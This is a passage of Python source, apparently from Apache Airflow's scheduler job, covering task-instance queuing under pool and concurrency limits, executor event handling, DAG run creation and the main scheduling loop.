self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
)
starved_pools = [pool_name for pool_name, stats in pools.items() if stats['open'] <= 0]
if starved_pools:
query = query.filter(not_(TI.pool.in_(starved_pools)))
query = query.limit(max_tis)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
session=session,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(repr(x) for x in task_instances_to_examine)
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[TI]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so if we can avoid loading the full
# serialized DAG, all the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(repr(x) for x in executable_tis)
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
if len(executable_tis) > 0:
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone
# on mysql when it's not UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
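# Detach the TI from the session so the in-memory object can be used after the
# session state changes, without the ORM tracking it further.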
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
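# Build the CLI command to run this task instance, then hand it to the executor
# together with the TI's priority and queue.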
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); on DBs that don't support this (such as
MariaDB or MySQL 5.x), the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instances whose state was changed.
"""
if self.max_tis_per_query == 0:
max_tis = self.executor.slots_available
else:
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 while the
# TI is not running, so we subtract 1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query, session=session).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.log.info('Setting task instance %s state to %s as reported by executor', ti, state)
ti.set_state(state)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
raise
finally:
try:
self.executor.end()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing Executor.end")
try:
self.processor_agent.end()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing DagFileProcessorAgent.end")
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = EventScheduler()
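# EventScheduler holds the periodic maintenance callbacks registered below; they are
# drained via timers.run() inside the main loop.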
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
timers.call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
timers.call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
timers.call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take places. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
self._create_dagruns_for_dags(guard, session)
dag_runs = self._get_next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
# Use try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
# SerializedDagNotFound should not happen here in the same loop because the DagRun would
# not be created in self._create_dag_runs if Serialized DAG does not exist
# But this would take care of the scenario when the Scheduler is restarted after DagRun is
# created and the DAG is deleted / renamed
try:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
continue
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find any TIs in state SCHEDULED and try to QUEUE them (send them to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only send this metric if we obtained the lock, otherwise we'll skew the
# metric way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
@retry_db_transaction
def _get_next_dagruns_to_examine(self, session):
"""Get Next DagRuns to Examine with retries"""
return DagRun.next_dagruns_to_examine(session)
@retry_db_transaction
def _create_dagruns_for_dags(self, guard, session):
"""Find Dag Models needing DagRuns and Create Dag Runs with retries in case of OperationalError"""
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Create a DAG run for each of the given DagModels (unless one already exists for its next_dagrun), and
update the dag_model's fields to control if/when the next DAGRun should be created
"""
# Bulk Fetch DagRuns with dag_id and execution_date same
# as DagModel.dag_id and DagModel.next_dagrun
# This list is used to verify if the DagRun already exists so that we don't attempt to create
# duplicate dag runs
if session.bind.dialect.name == 'mssql':
active_dagruns_filter = or_(
*[
and_(
DagRun.dag_id == dm.dag_id,
DagRun.execution_date == dm.next_dagrun,
)
for dm in dag_models
]
)
else:
active_dagruns_filter = tuple_(DagRun.dag_id, DagRun.execution_date).in_(
[(dm.dag_id, dm.next_dagrun) for dm in dag_models]
)
active_dagruns = (
session.query(DagRun.dag_id, DagRun.execution_date).filter(active_dagruns_filter).all()
)
for dag_model in dag_models:
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
# We opted to check for DagRun existence instead
# of catching an IntegrityError and rolling back the session, i.e.
# we need to run self._update_dag_next_dagruns whether the Dag Run already exists or we
# create a new one. This is so that in the next scheduling loop we try to create new runs
# instead of falling into a loop of IntegrityErrors.
if (dag.dag_id, dag_model.next_dagrun) not in active_dagruns:
run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
expected_start_date = dag.following_schedule(run.execution_date)
if expected_start_date:
schedule_delay = run.start_date - expected_start_date
Stats.timing(
f'dagrun.schedule_delay.{dag.dag_id}',
schedule_delay,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dags (we've just created a DagRun for them, after all).
active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger == expression.false(),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
# Get the DAG in a try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Execution dates of the currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.set_state(State.FAILED)
unfinished_task_instances = (
session.query(TI)
.filter(TI.dag_id == dag_run.dag_id)
.filter(TI.execution_date == dag_run.execution_date)
.filter(TI.state.in_(State.unfinished))
)
for task_instance in unfinished_task_instances:
task_instance.state = State.SKIPPED
session.merge(task_instance)
session.flush()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
# Work out if we should allow creating a new DagRun now?
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
